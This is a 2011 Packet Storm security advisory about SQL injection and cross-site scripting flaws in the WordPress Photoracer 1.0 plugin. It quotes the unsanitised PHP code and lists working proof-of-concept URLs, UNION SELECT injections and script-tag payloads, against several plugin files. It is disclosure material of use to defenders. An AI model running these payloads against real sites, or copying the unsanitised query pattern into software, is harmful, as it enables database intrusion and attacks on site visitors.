WordPress Photoracer 1.0 Cross Site Scripting / SQL Injection

2011-08-28T00:00:00
ID PACKETSTORM:104541
Type packetstorm
Reporter Pr0T3cT10n
Modified 2011-08-28T00:00:00

Description

                                        
                                            `##########################################################################  
## WordPress Photoracer Plugin <= 1.0 Multiple XSS & SQLI Vulnerabilities  
## Tested on Wordpress 3.2 Hebrew, Photoracer 1.0  
## Vulnerabilities:  
## * XSS  
## * SQL Injection  
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>  
## Date: 26/08/2011  
## Software Link: http://wordpress.org/extend/plugins/photoracer/  
## ISRAEL  
##########################################################################  
## Author will be not responsible for any damage.  
##########################################################################  
  
## Vulnerable Code - mostvoted.php [15-22]:  
15.if (isset($_REQUEST['pid']) || isset($_REQUEST['prid']))  
16. $postid = $_REQUEST['pid'] ? $_REQUEST['pid'] : $_REQUEST['prid'];  
17.if (isset($_REQUEST['p']))  
18. $p = $_REQUEST['p'];  
19.if ($postid == 0) exit;  
20.$q1 = "SELECT raceid, active_from, active_to, indexpath, name, headcontent, numphoto FROM ".  
21. $wpdb->prefix."photoracer_admin where postid=$postid";  
22.$out = $wpdb->get_row($q1);  
  
## NOTE:  
## As you can see there is no validation or any filter to variable $postid ($_REQUEST['pid'] and $_REQUEST['prid']).  
## See line 16. so you can inject sql query by using $postid;  
## SQL Injection PoC:  
http://www.example.com/wp-content/plugins/photoracer/mostvoted.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
http://www.example.com/wp-content/plugins/photoracer/mostvoted.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
####################################################################################################################################################  
  
## Vulnerable Code - mostviewed.php [15-22]:  
15.if (isset($_REQUEST['pid']) || isset($_REQUEST['prid']))  
16. $postid = $_REQUEST['pid'] ? $_REQUEST['pid'] : $_REQUEST['prid'];  
17.if (isset($_REQUEST['p']))  
18. $p = $_REQUEST['p'];  
19.if ($postid == 0) exit;  
20.$q1 = "SELECT raceid, active_from, active_to, indexpath, name, headcontent, numphoto FROM ".  
21. $wpdb->prefix."photoracer_admin where postid=$postid";  
22.$out = $wpdb->get_row($q1);  
  
## NOTE:  
## As you can see there is no validation or any filter to variable $postid ($_REQUEST['pid'] and $_REQUEST['prid']).  
## See line 16. so you can inject sql query by using $postid;  
## SQL Injection PoC:  
http://www.example.com/wp-content/plugins/photoracer/mostviewed.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
http://www.example.com/wp-content/plugins/photoracer/mostviewed.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
####################################################################################################################################################  
  
## Vulnerable Code - crono.php [15-22]:  
15.if (isset($_REQUEST['pid']) || isset($_REQUEST['prid']))  
16. $postid = $_REQUEST['pid'] ? $_REQUEST['pid'] : $_REQUEST['prid'];  
17.if (isset($_REQUEST['p']))  
18. $p = $_REQUEST['p'];  
19.if ($postid == 0) exit;  
20.$q1 = "SELECT raceid, active_from, active_to, indexpath, name, headcontent, numphoto FROM ".  
21. $wpdb->prefix."photoracer_admin where postid=$postid";  
22.$out = $wpdb->get_row($q1);  
  
## NOTE:  
## As you can see there is no validation or any filter to variable $postid ($_REQUEST['pid'] and $_REQUEST['prid']).  
## See line 16. so you can inject sql query by using $postid;  
## SQL Injection PoC:  
http://www.example.com/wp-content/plugins/photoracer/crono.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
http://www.example.com/wp-content/plugins/photoracer/crono.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
####################################################################################################################################################  
  
## Vulnerable Code - changefrom.php [31, 47-49]:  
31.if (isset($_REQUEST['rid'])) $rid = $_REQUEST['rid'];  
...........  
47.$prq="SELECT raceid, postid, active_from, active_to, indexpath, name, numphoto FROM ".$wpdb->prefix."photoracer_admin WHERE raceid=$rid";  
48.//echo $pr_qlist."<br>\n";  
49.$out = $wpdb->get_row($prq);  
  
## NOTE:  
## As you can see there is no validation or any filter to variable $rid ($_REQUEST['rid']).  
## See line 31. so you can inject sql query by using $postid;  
## SQL Injection PoC:  
http://www.example.com/wp-content/plugins/photoracer/changefrom.php?rid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
####################################################################################################################################################  
  
## Vulnerable Code - changefrom.php [31, 47-49]:  
31.if (isset($_REQUEST['rid'])) $rid = $_REQUEST['rid'];  
...........  
47.$prq="SELECT raceid, postid, active_from, active_to, indexpath, name, numphoto FROM ".$wpdb->prefix."photoracer_admin WHERE raceid=$rid";  
48.//echo $pr_qlist."<br>\n";  
49.$out = $wpdb->get_row($prq);  
  
## NOTE:  
## As you can see there is no validation or any filter to variable $rid ($_REQUEST['rid']).  
## See line 31. so you can inject sql query by using $postid;  
## SQL Injection PoC:  
http://www.example.com/wp-content/plugins/photoracer/changeto.php?rid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7  
####################################################################################################################################################  
  
  
## XSS PoC:  
http://www.example.com/wp-content/plugins/photoracer/changefrom.php?rid="><script>alert(1);</script>  
http://www.example.com/wp-content/plugins/photoracer/changeto.php?rid="><script>alert(1);</script>  
  
  
`